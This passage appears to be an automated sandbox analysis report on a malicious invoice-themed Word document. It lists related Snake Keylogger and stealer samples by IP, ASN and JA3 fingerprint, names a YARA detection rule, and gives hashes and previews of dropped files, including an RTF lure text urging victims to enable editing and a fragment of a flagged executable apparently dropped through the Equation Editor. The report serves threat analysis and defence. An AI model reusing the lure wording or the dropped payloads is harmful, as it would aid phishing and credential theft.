                    RFQ 20726 - T5 7841.exeGet hashmaliciousSnake KeyloggerBrowse
                    • 188.114.96.3
                    file.exeGet hashmaliciousSnake KeyloggerBrowse
                    • 188.114.97.3
                    7vwfhMuUQg.exeGet hashmaliciousSnake KeyloggerBrowse
                    • 188.114.96.3
                    j6OUc3S2uP.exeGet hashmaliciousSnake KeyloggerBrowse
                    • 188.114.96.3
                    7vwfhMuUQg.exeGet hashmaliciousSnake KeyloggerBrowse
                    • 188.114.96.3
                    1mXbuDDPbF.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                    • 188.114.97.3
                    k8TljgjfDl.exeGet hashmaliciousSnake KeyloggerBrowse
                    • 188.114.97.3
                    IMG_0178520003023PDF.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                    • 188.114.97.3
                    checkip.dyndns.comCR693029829.exeGet hashmaliciousSnake KeyloggerBrowse
                    • 193.122.130.0
                    Contract.exeGet hashmaliciousSnake KeyloggerBrowse
                    • 193.122.130.0
                    RFQ 20726 - T5 7841.exeGet hashmaliciousSnake KeyloggerBrowse
                    • 193.122.130.0
                    file.exeGet hashmaliciousSnake KeyloggerBrowse
                    • 132.226.247.73
                    7vwfhMuUQg.exeGet hashmaliciousSnake KeyloggerBrowse
                    • 132.226.247.73
                    j6OUc3S2uP.exeGet hashmaliciousSnake KeyloggerBrowse
                    • 132.226.8.169
                    7vwfhMuUQg.exeGet hashmaliciousSnake KeyloggerBrowse
                    • 132.226.247.73
                    1mXbuDDPbF.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                    • 193.122.130.0
                    k8TljgjfDl.exeGet hashmaliciousSnake KeyloggerBrowse
                    • 132.226.247.73
                    project plan.exeGet hashmaliciousSnake KeyloggerBrowse
                    • 132.226.247.73
                    riell.topswift_copy.docx.docGet hashmaliciousUnknownBrowse
                    • 188.114.96.3
                    swift_copy.docx.docGet hashmaliciousUnknownBrowse
                    • 188.114.97.3

                    ASNs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    ORACLE-BMC-31898USCR693029829.exeGet hashmaliciousSnake KeyloggerBrowse
                    • 193.122.130.0
                    Contract.exeGet hashmaliciousSnake KeyloggerBrowse
                    • 193.122.130.0
                    RFQ 20726 - T5 7841.exeGet hashmaliciousSnake KeyloggerBrowse
                    • 193.122.130.0
                    1mXbuDDPbF.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                    • 193.122.130.0
                    IMG_0178520003023PDF.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                    • 158.101.44.242
                    payment.exeGet hashmaliciousSnake KeyloggerBrowse
                    • 158.101.44.242
                    FiddlerSetup.5.0.20243.10853-latest.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                    • 192.29.11.142
                    https://ssl.sonicsecuremail.com/r.aspx?b=8&e=pamela%2Ecase%40marionfl%2Eorg&p=4VEU&cb=181Get hashmaliciousUnknownBrowse
                    • 192.29.14.118
                    PETUNJUK-PENGISIAN DAN PENGIRIMAN KONFIRMASI EDITED.xlsx.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                    • 193.122.6.168
                    whiteee.exeGet hashmaliciousSnake KeyloggerBrowse
                    • 193.122.6.168
                    CLOUDFLARENETUShttps://1drv.ms/b/c/76a2f2769a0f2d92/EVBBlcPr69hPlwB4teIJkR8BhOEwtE3haDg1sSdukRfZrw?e=geYoLrGet hashmaliciousHTMLPhisherBrowse
                    • 1.1.1.1
                    https://1drv.ms/b/c/76a2f2769a0f2d92/EVBBlcPr69hPlwB4teIJkR8BhOEwtE3haDg1sSdukRfZrw?e=geYoLrGet hashmaliciousHTMLPhisherBrowse
                    • 1.1.1.1
                    file.exeGet hashmaliciousLummaC, SmokeLoaderBrowse
                    • 104.21.45.251
                    xJwSq336bs.pdfGet hashmaliciousUnknownBrowse
                    • 104.17.25.14
                    https://chorbie.com/services/Get hashmaliciousUnknownBrowse
                    • 188.114.96.3
                    https://share.mindmanager.com/#publish/mnPTcUqLfLnU6HRHMb6xC3qXYGZYU6tmBtOy3sS6Get hashmaliciousHTMLPhisherBrowse
                    • 104.17.25.14
                    file.exeGet hashmaliciousClipboard Hijacker, PureLog Stealer, RisePro Stealer, zgRATBrowse
                    • 104.17.28.25
                    Invoice - 06736833774062515586349558087774116555577037575401 - Daiichi-sankyo.pdfGet hashmaliciousHTMLPhisherBrowse
                    • 104.21.40.60
                    0001.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                    • 172.67.74.152
                    Leaked.exeGet hashmaliciousXWormBrowse
                    • 188.114.96.3
                    UTMEMUSfile.exeGet hashmaliciousSnake KeyloggerBrowse
                    • 132.226.247.73
                    7vwfhMuUQg.exeGet hashmaliciousSnake KeyloggerBrowse
                    • 132.226.247.73
                    j6OUc3S2uP.exeGet hashmaliciousSnake KeyloggerBrowse
                    • 132.226.8.169
                    7vwfhMuUQg.exeGet hashmaliciousSnake KeyloggerBrowse
                    • 132.226.247.73
                    k8TljgjfDl.exeGet hashmaliciousSnake KeyloggerBrowse
                    • 132.226.247.73
                    project plan.exeGet hashmaliciousSnake KeyloggerBrowse
                    • 132.226.247.73
                    MT_01452_03607PDF.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                    • 132.226.247.73
                    lista de cotizaciones.xlam.exeGet hashmaliciousSnake KeyloggerBrowse
                    • 132.226.8.169
                    Details.exeGet hashmaliciousSnake KeyloggerBrowse
                    • 132.226.8.169
                    oHchwlxMNG.exeGet hashmaliciousSnake KeyloggerBrowse
                    • 132.226.247.73
                    CLOUDFLARENETUShttps://1drv.ms/b/c/76a2f2769a0f2d92/EVBBlcPr69hPlwB4teIJkR8BhOEwtE3haDg1sSdukRfZrw?e=geYoLrGet hashmaliciousHTMLPhisherBrowse
                    • 1.1.1.1
                    https://1drv.ms/b/c/76a2f2769a0f2d92/EVBBlcPr69hPlwB4teIJkR8BhOEwtE3haDg1sSdukRfZrw?e=geYoLrGet hashmaliciousHTMLPhisherBrowse
                    • 1.1.1.1
                    file.exeGet hashmaliciousLummaC, SmokeLoaderBrowse
                    • 104.21.45.251
                    xJwSq336bs.pdfGet hashmaliciousUnknownBrowse
                    • 104.17.25.14
                    https://chorbie.com/services/Get hashmaliciousUnknownBrowse
                    • 188.114.96.3
                    https://share.mindmanager.com/#publish/mnPTcUqLfLnU6HRHMb6xC3qXYGZYU6tmBtOy3sS6Get hashmaliciousHTMLPhisherBrowse
                    • 104.17.25.14
                    file.exeGet hashmaliciousClipboard Hijacker, PureLog Stealer, RisePro Stealer, zgRATBrowse
                    • 104.17.28.25
                    Invoice - 06736833774062515586349558087774116555577037575401 - Daiichi-sankyo.pdfGet hashmaliciousHTMLPhisherBrowse
                    • 104.21.40.60
                    0001.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                    • 172.67.74.152
                    Leaked.exeGet hashmaliciousXWormBrowse
                    • 188.114.96.3
                    ORACLE-BMC-31898USCR693029829.exeGet hashmaliciousSnake KeyloggerBrowse
                    • 193.122.130.0
                    Contract.exeGet hashmaliciousSnake KeyloggerBrowse
                    • 193.122.130.0
                    RFQ 20726 - T5 7841.exeGet hashmaliciousSnake KeyloggerBrowse
                    • 193.122.130.0
                    1mXbuDDPbF.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                    • 193.122.130.0
                    IMG_0178520003023PDF.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                    • 158.101.44.242
                    payment.exeGet hashmaliciousSnake KeyloggerBrowse
                    • 158.101.44.242
                    FiddlerSetup.5.0.20243.10853-latest.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                    • 192.29.11.142
                    https://ssl.sonicsecuremail.com/r.aspx?b=8&e=pamela%2Ecase%40marionfl%2Eorg&p=4VEU&cb=181Get hashmaliciousUnknownBrowse
                    • 192.29.14.118
                    PETUNJUK-PENGISIAN DAN PENGIRIMAN KONFIRMASI EDITED.xlsx.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                    • 193.122.6.168
                    whiteee.exeGet hashmaliciousSnake KeyloggerBrowse
                    • 193.122.6.168

                    JA3 Fingerprints

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    05af1f5ca1b87cc9cc9b25185115607dswift_copy.docx.docGet hashmaliciousUnknownBrowse
                    • 188.114.97.3
                    • 188.114.96.3
                    Pod0SuHrkb.rtfGet hashmaliciousUnknownBrowse
                    • 188.114.97.3
                    • 188.114.96.3
                    orden de compra.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                    • 188.114.97.3
                    • 188.114.96.3
                    DHL Invoice 20240407.xlsGet hashmaliciousFormBookBrowse
                    • 188.114.97.3
                    • 188.114.96.3
                    bodtfUNu8p.rtfGet hashmaliciousUnknownBrowse
                    • 188.114.97.3
                    • 188.114.96.3
                    Payment receipt_1.docx.docGet hashmaliciousLokibotBrowse
                    • 188.114.97.3
                    • 188.114.96.3
                    Ship particulars.xlsGet hashmaliciousUnknownBrowse
                    • 188.114.97.3
                    • 188.114.96.3
                    Inquiry HA-22-28199 22-Q22024.docGet hashmaliciousFormBookBrowse
                    • 188.114.97.3
                    • 188.114.96.3
                    Inquiry HA-22-28199 22-Q22024.docGet hashmaliciousFormBookBrowse
                    • 188.114.97.3
                    • 188.114.96.3
                    4YlwTsmpuZ.rtfGet hashmaliciousUnknownBrowse
                    • 188.114.97.3
                    • 188.114.96.3
                    7dcce5b76c8b17472d024758970a406bswift_copy.docx.docGet hashmaliciousUnknownBrowse
                    • 188.114.97.3
                    Payment receipt_1.docx.docGet hashmaliciousLokibotBrowse
                    • 188.114.97.3
                    Payment_Advice.xlsGet hashmaliciousUnknownBrowse
                    • 188.114.97.3
                    SecuriteInfo.com.Exploit.CVE-2018-0798.4.30916.4690.rtfGet hashmaliciousUnknownBrowse
                    • 188.114.97.3
                    statement .xlsGet hashmaliciousUnknownBrowse
                    • 188.114.97.3
                    INQUIRY#809676-JULY1.xla.xlsxGet hashmaliciousUnknownBrowse
                    • 188.114.97.3
                    Bank Slip 2.docGet hashmaliciousSnake KeyloggerBrowse
                    • 188.114.97.3
                    INQUIRY#809676-JULY1.xla.xlsxGet hashmaliciousUnknownBrowse
                    • 188.114.97.3
                    Scan_Hsbc_Payment_advice.xlsGet hashmaliciousLokibotBrowse
                    • 188.114.97.3
                    RFQ_4155965-EU2406.xlsxGet hashmaliciousAgentTesla, PureLog StealerBrowse
                    • 188.114.97.3

                    Dropped Files

                    No context

                    Created / dropped Files

                    C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD (copy)

                    Download File
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):131072
                    Entropy (8bit):0.02556643955180457
                    Encrypted:false
                    SSDEEP:6:I3DPcBTzAj8KBXJ9vxggLR3EoHAe7BRXv//4tfnRujlw//+GtluJ/eRuj:I3DPKEj7bbtHdPvYg3J/
                    MD5:858DBBD85F0BDAB9692F8B484A7F0D2C
                    SHA1:0441CB3C6680D138FB0FC9BDF089DC71D4E07174
                    SHA-256:852E3D421B4154887B27542A80B3F50102F998D8D215AF9A3671D7F0E76D85E2
                    SHA-512:4965E27506BC95B0133DD6A39819B2DAC92D3519DE4C7037B443299C8803AC026CAA19A835E200C2C3A9D778BAEE102C3B2BEDDB0EC402011206EC5A8660A169
                    Malicious:false
                    Reputation:low
                    Preview:......M.eFy...zC/.n..H.....TIS,...X.F...Fa.q.............................,...t.N.b..3............KM...H....x..P.....................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\obb[1].doc

                    Download File
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:Rich Text Format data, version 1
                    Category:dropped
                    Size (bytes):549151
                    Entropy (8bit):3.7501066868878303
                    Encrypted:false
                    SSDEEP:6144:cGuqGuqGuqGuqGuqGuqGuqGuqGuqGuqGuqGuqGuqGuqGuqGuqGuqGuqGuqGuhSaV:ay
                    MD5:3F9A089317AFA13A17B61D5E0F95B75E
                    SHA1:F5129818D643FBA59BF77BC2785EEF2AF34DB679
                    SHA-256:09CC281D7242AEDDD2DE25D63EF16E9B8D190BD06D31928410FDAEF1E5A5C351
                    SHA-512:6A73233318865BD82C9A15887421A1197FEBFB88070216979BE9C04F97C9749DAE728FD75F3C4D372F4A7C0E834750E3AAC4422508BCBBC39D9EC82D9C1822C8
                    Malicious:false
                    Yara Hits:
                    • Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\obb[1].doc, Author: ditekSHen
                    Reputation:low
                    Preview:{\rtf1..{\*\qGdJoyz5HXg76Q8inCR7sNt2WUiKSO8z6tYFzWA9JfeCvqEHRKwuax4htC20aUKwgpmWPY79qVgKoIVb1rVkQM2EvEgxBSB7qEpWsjrx}..{\619637961please click Enable editing from the yellow bar above.The independent auditors. opinion says the financial statements are fairly stated in ...accordance with the basis of accounting used by your organization. So why are the auditors giving you that other letter In an audit of ...financial statements, professional standards require that auditors obtain an understanding of internal controls to the extent necessary to ...plan the audit. Auditors use this understanding of internal controls to assess the risk of material misstatement of the financial ...statements and to design appropriate audit procedures to minimize that risk.The definition of good internal controls is that they allow ...errors and other misstatements to be prevented or detected and corrected by (the nonprofit.s) employees in the normal course of performing ...their duties. If the auditors dete

                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\obb[1].scr

                    Download File
                    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                    Category:dropped
                    Size (bytes):520704
                    Entropy (8bit):7.363165773317466
                    Encrypted:false
                    SSDEEP:12288:NCHm2ADAAtm9M08jBCZ5pYYfa5LmgmvUetrtEDtr7ksXJs4CGSNkrzQaR0birorA:Nf7m608jBCZ5pYYfadmgmvBtrt6p7DeW
                    MD5:F7BDADAFF67E573F145D2E8E32E32CD8
                    SHA1:CFD1377D49E09ECFA842760DD9CC78CC17A34628
                    SHA-256:FE80EEADE269CE2B6688E039296FC9E9743E24F881341ADAD24E220967312316
                    SHA-512:25477C0A78D20A43C6CFA7819185C680566C20E6D0C7A65FFECBDDC91DF9BD91310B6368B849B6F8F6688D85A2C86E3C9AF1F68EC4358DEB3CC94A6473D3F4C6
                    Malicious:true
                    Antivirus:
                    • Antivirus: Joe Sandbox ML, Detection: 100%
                    • Antivirus: ReversingLabs, Detection: 58%
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....:,...............0.................. ... ....@.. .......................`............@.................................l...O.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H.......|X.............0c..L...............................................( ) ....&.(1.....*".......*".(6....*Vs....(7...t.........*...}.....(8.....~5...tT...(9...&.(.....*..*.(.........*".s....&*.r...p.4...(Z...(%...o[...o\....#..5....(]....0...*....}3....(1.......{3....X.....}2...*z.(1.......}6.....}7.....}8...*z.()...-..(*...,.r...p.(c...*.*"..(+...*2~9....od...*..oe..../..*..of...._3...of...._3...of...._.....*.*..(i...*.~:...*.(/...,.r...p......%...%...(n...*..(o...*.(/

                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\56784164.doc

                    Download File
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:Rich Text Format data, version 1
                    Category:dropped
                    Size (bytes):549151
                    Entropy (8bit):3.7501066868878303
                    Encrypted:false
                    SSDEEP:6144:cGuqGuqGuqGuqGuqGuqGuqGuqGuqGuqGuqGuqGuqGuqGuqGuqGuqGuqGuqGuhSaV:ay
                    MD5:3F9A089317AFA13A17B61D5E0F95B75E
                    SHA1:F5129818D643FBA59BF77BC2785EEF2AF34DB679
                    SHA-256:09CC281D7242AEDDD2DE25D63EF16E9B8D190BD06D31928410FDAEF1E5A5C351
                    SHA-512:6A73233318865BD82C9A15887421A1197FEBFB88070216979BE9C04F97C9749DAE728FD75F3C4D372F4A7C0E834750E3AAC4422508BCBBC39D9EC82D9C1822C8
                    Malicious:false
                    Yara Hits:
                    • Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\56784164.doc, Author: ditekSHen
                    Reputation:low
                    Preview:{\rtf1..{\*\qGdJoyz5HXg76Q8inCR7sNt2WUiKSO8z6tYFzWA9JfeCvqEHRKwuax4htC20aUKwgpmWPY79qVgKoIVb1rVkQM2EvEgxBSB7qEpWsjrx}..{\619637961please click Enable editing from the yellow bar above.The independent auditors. opinion says the financial statements are fairly stated in ...accordance with the basis of accounting used by your organization. So why are the auditors giving you that other letter In an audit of ...financial statements, professional standards require that auditors obtain an understanding of internal controls to the extent necessary to ...plan the audit. Auditors use this understanding of internal controls to assess the risk of material misstatement of the financial ...statements and to design appropriate audit procedures to minimize that risk.The definition of good internal controls is that they allow ...errors and other misstatements to be prevented or detected and corrected by (the nonprofit.s) employees in the normal course of performing ...their duties. If the auditors dete

                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{56E3829F-B9EE-407D-9BA0-759B5D6DE9EF}.tmp

                    Download File
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:Composite Document File V2 Document, Cannot read section info
                    Category:dropped
                    Size (bytes):6144
                    Entropy (8bit):4.068584386932005
                    Encrypted:false
                    SSDEEP:96:jP0MPNRFqxPR6+idxFvuRZYmPO4cbpSvS:zFPNRmPAjdxcRmEO9
                    MD5:FEC10A763C7F9617CE078700B832E0A9
                    SHA1:2300E26DC93B01214444321323C62ACCD8F02B67
                    SHA-256:F2083F94B8C345DB5189DAFA00C2A83349DA46C884856FD2CB8F797DB824E42E
                    SHA-512:1F816D4492E91611887A9DAA81A99D02C2980BE6D54E353769133C90F15364102A915C0DD3C4F4B3D6F8704EAF0C71EF98353320E0E02FC2C90A0869F9E820E5
                    Malicious:true
                    Antivirus:
                    • Antivirus: Avira, Detection: 100%
                    Reputation:low
                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{3377BE63-CA6F-4392-A9C1-FA2F278DEB4B}.tmp

                    Download File
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):1536
                    Entropy (8bit):1.353360737776369
                    Encrypted:false
                    SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbO:IiiiiiiiiifdLloZQc8++lsJe1MzZ
                    MD5:D190D1A931616300D3C497C0B72B3EE5
                    SHA1:917EC82F9939F31F73888AB12D32BF715A7CDC3C
                    SHA-256:CCA8F779E41F94B453A0BB7D1EA606FF02C2857D3DE0813462D8A2B3F1626D68
                    SHA-512:941C0AD00DA589F54D3E9F7809F754A7776D08D9EEB5D36998BA951AF5569EDE775565C519146F98B57E62A243C3B5F5FA75CC85AF9FA471C526FD297478EADB
                    Malicious:false
                    Reputation:low
                    Preview:..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{9DDE2674-4367-40B6-80BF-7E7F99CD90A9}.tmp

                    Download File
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):352800
                    Entropy (8bit):3.4392250194188922
                    Encrypted:false
                    SSDEEP:6144:Iyemryemryemryemryemryemryemryemryemryemryemryemryemryemryemryew:u
                    MD5:CFFD575641C895B7CB170532B2057CE3
                    SHA1:2E59F205A0B660A81681E730B0E4CDE438F80303
                    SHA-256:22744545E8FF77D2090E1D9AF5CD3368D44E4156261254EFFC234476B48CB20C
                    SHA-512:F80F3AC5D84E471F58FC5A1905F237635E0AA0532CFC63D1A576F70396434746AD4B45A7474F52451CA13BDF4EA7D767196A99ED4C8F8FB81D39F0F6A4A01F75
                    Malicious:false
                    Reputation:low
                    Preview:1.9.6.3.7.9.6.1.p.l.e.a.s.e. .c.l.i.c.k. .E.n.a.b.l.e. .e.d.i.t.i.n.g. .f.r.o.m. .t.h.e. .y.e.l.l.o.w. .b.a.r. .a.b.o.v.e...T.h.e. .i.n.d.e.p.e.n.d.e.n.t. .a.u.d.i.t.o.r.s.. .o.p.i.n.i.o.n. .s.a.y.s. .t.h.e. .f.i.n.a.n.c.i.a.l. .s.t.a.t.e.m.e.n.t.s. .a.r.e. .f.a.i.r.l.y. .s.t.a.t.e.d. .i.n. .a.c.c.o.r.d.a.n.c.e. .w.i.t.h. .t.h.e. .b.a.s.i.s. .o.f. .a.c.c.o.u.n.t.i.n.g. .u.s.e.d. .b.y. .y.o.u.r. .o.r.g.a.n.i.z.a.t.i.o.n... .S.o. .w.h.y. .a.r.e. .t.h.e. .a.u.d.i.t.o.r.s. .g.i.v.i.n.g. .y.o.u. .t.h.a.t. .o.t.h.e.r. .l.e.t.t.e.r. .I.n. .a.n. .a.u.d.i.t. .o.f. .f.i.n.a.n.c.i.a.l. .s.t.a.t.e.m.e.n.t.s.,. .p.r.o.f.e.s.s.i.o.n.a.l. .s.t.a.n.d.a.r.d.s. .r.e.q.u.i.r.e. .t.h.a.t. .a.u.d.i.t.o.r.s. .o.b.t.a.i.n. .a.n. .u.n.d.e.r.s.t.a.n.d.i.n.g. .o.f. .i.n.t.e.r.n.a.l. .c.o.n.t.r.o.l.s. .t.o. .t.h.e. .e.x.t.e.n.t. .n.e.c.e.s.s.a.r.y. .t.o. .p.l.a.n. .t.h.e. .a.u.d.i.t... .A.u.d.i.t.o.r.s. .u.s.e. .t.h.i.s. .u.n.d.e.r.s.t.a.n.d.i.n.g. .o.f. .i.n.t.e.r.n.a.l. .c.o.n.t.r.o.l.s. .t.o. .a.s.s.e.s.s. .

                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B3E7E0B3-D5E2-42DC-A1FC-D3619BF7B6CC}.tmp

                    Download File
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):46874
                    Entropy (8bit):3.551464186925344
                    Encrypted:false
                    SSDEEP:768:uaWvW5Kq2g0Zos0SCWiMuz1rqAyLt+eqViz9yCFcEhZVsft:FgemiDvwxKrK2ft
                    MD5:AC7C710B6CA9D66ED9923D65C708B21B
                    SHA1:756E2D7C42EF9BF05DA7EA871B077BB6DAFCD8E7
                    SHA-256:C1BEA8318A21530E776F4E3336A3F5E8AFE04F52FBB44F254304A9F36C570B68
                    SHA-512:B366139A262F47A8C38FC1B5E649F9529E5E89471FF34B543A484737F84C6AF7185AB363946BFBD17DB9BA6642D0CE5520BEA236693CA27E3AF123816809F65C
                    Malicious:false
                    Reputation:moderate, very likely benign file
                    Preview:..d.M.B.C.....B.E.S.O.N.D.E.R.H.E.D.E. .B.E.S.O.N.D.E.R.H.E.D.E. .V.I.R. .H.I.E.R.D.I.E. .M.A.A.N.D.....D.R.A.E.N.D.E. .N.R... .H.O.E.V.....3.0.2.0.8. .N.B.C. .D.R.A.A.G. .3.0. .S.T.K.....3.0.3.0.8. .N.B.C. .D.R.A.A.G. .6. .S.T.K.....3.2.0.0.7.X. .N.B.C. .D.R.A.A.G. .7.4. .S.T.K.....3.3.0.0.5. .N.B.C. .w.a.t. .5. .s.t.e.l.l.e. .d.r.a.....5.2.7.9.9. ./. .8.0.0.U. .(.2.5.8.7.7./.2.1.). .N.B.C. .w.a.t. .3.0. .P.C.S. .d.r.a.....6.0.0.1. .N.B.C. .w.a.t. .1.0.0. .s.t.u.k.s. .d.r.a.....6.0.0.4. .N.B.C. .w.a.t. ...................f...h...................................R...T..................................................................................................................................................................................................................................................................................................<...$..$.If........!v..h.#v..9.:V....l...,..t.......9..6.,.....5.....9.9...../.............B.....a..].p............yt%~D.....d........gd%

                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{E99E1800-284E-46BB-8918-39BEC0D2E5EE}.tmp

                    Download File
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):1024
                    Entropy (8bit):0.05390218305374581
                    Encrypted:false
                    SSDEEP:3:ol3lYdn:4Wn
                    MD5:5D4D94EE7E06BBB0AF9584119797B23A
                    SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                    SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                    SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                    Malicious:false
                    Reputation:high, very likely benign file
                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\{3F9F2CA1-0B11-43D2-B9EA-6D13F79A8244}

                    Download File
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):131072
                    Entropy (8bit):0.02556643955180457
                    Encrypted:false
                    SSDEEP:6:I3DPcBTzAj8KBXJ9vxggLR3EoHAe7BRXv//4tfnRujlw//+GtluJ/eRuj:I3DPKEj7bbtHdPvYg3J/
                    MD5:858DBBD85F0BDAB9692F8B484A7F0D2C
                    SHA1:0441CB3C6680D138FB0FC9BDF089DC71D4E07174
                    SHA-256:852E3D421B4154887B27542A80B3F50102F998D8D215AF9A3671D7F0E76D85E2
                    SHA-512:4965E27506BC95B0133DD6A39819B2DAC92D3519DE4C7037B443299C8803AC026CAA19A835E200C2C3A9D778BAEE102C3B2BEDDB0EC402011206EC5A8660A169
                    Malicious:false
                    Preview:......M.eFy...zC/.n..H.....TIS,...X.F...Fa.q.............................,...t.N.b..3............KM...H....x..P.....................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\{A90A2188-306E-4952-AFDE-E7959AACBB71}

                    Download File
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):131072
                    Entropy (8bit):0.02565905250870931
                    Encrypted:false
                    SSDEEP:6:I3DPcteK7HvxggLRbGaCjcgUOy0tRXv//4tfnRujlw//+GtluJ/eRuj:I3DPceK7P37WvYg3J/
                    MD5:ACD3DAD77F830B641A5F046F00CFD3BB
                    SHA1:3411C483D08249670CB5AF78633798799099318C
                    SHA-256:DF0DA4B7E7739CD7E358E00B10B3ABDE25DB79BA50509C9EC082DDC5B1B72FB5
                    SHA-512:614DD45BC2A341C9BD079DEAE002A083986D97578EADE0E328AB10262CDB3F59147CD8B18EFF4A2208997D344E108941CB816AC532A0A5B726214BA2E2C5DFDD
                    Malicious:false
                    Preview:......M.eFy...z..:....N.N......S,...X.F...Fa.q.............................?h.p.&F.(..Z..S...........0.N._.T^!.......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\OVER DUE INVOICE PAYMENT.docx.LNK

                    Download File
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:21 2023, mtime=Fri Aug 11 15:42:21 2023, atime=Thu Jul 4 18:38:20 2024, length=16418, window=hide
                    Category:dropped
                    Size (bytes):1109
                    Entropy (8bit):4.5873941792708495
                    Encrypted:false
                    SSDEEP:24:8Flk/XTi/352Eczj5Ketc8oCej54Dv3qm1k7N:8s/XTw5ozj5KzCej5ngiN
                    MD5:72CC07289A3030A0C53A1D3CA92DFED1
                    SHA1:706C2C227EAB2D7B006442A619B994FC3F57E95C
                    SHA-256:A8FE29923F44084AA4F2870E8A1721F7B4412B9E713781F6C61315F795D16876
                    SHA-512:C1F3DBE309E56D8F5CAA683B496D085E6B506C6A4040AD5C7A0C63CADBD37C8B24D2E89894E14EA30B3A8278DD612269DCC70B51859667EC099631BD0D0B4B5E
                    Malicious:false
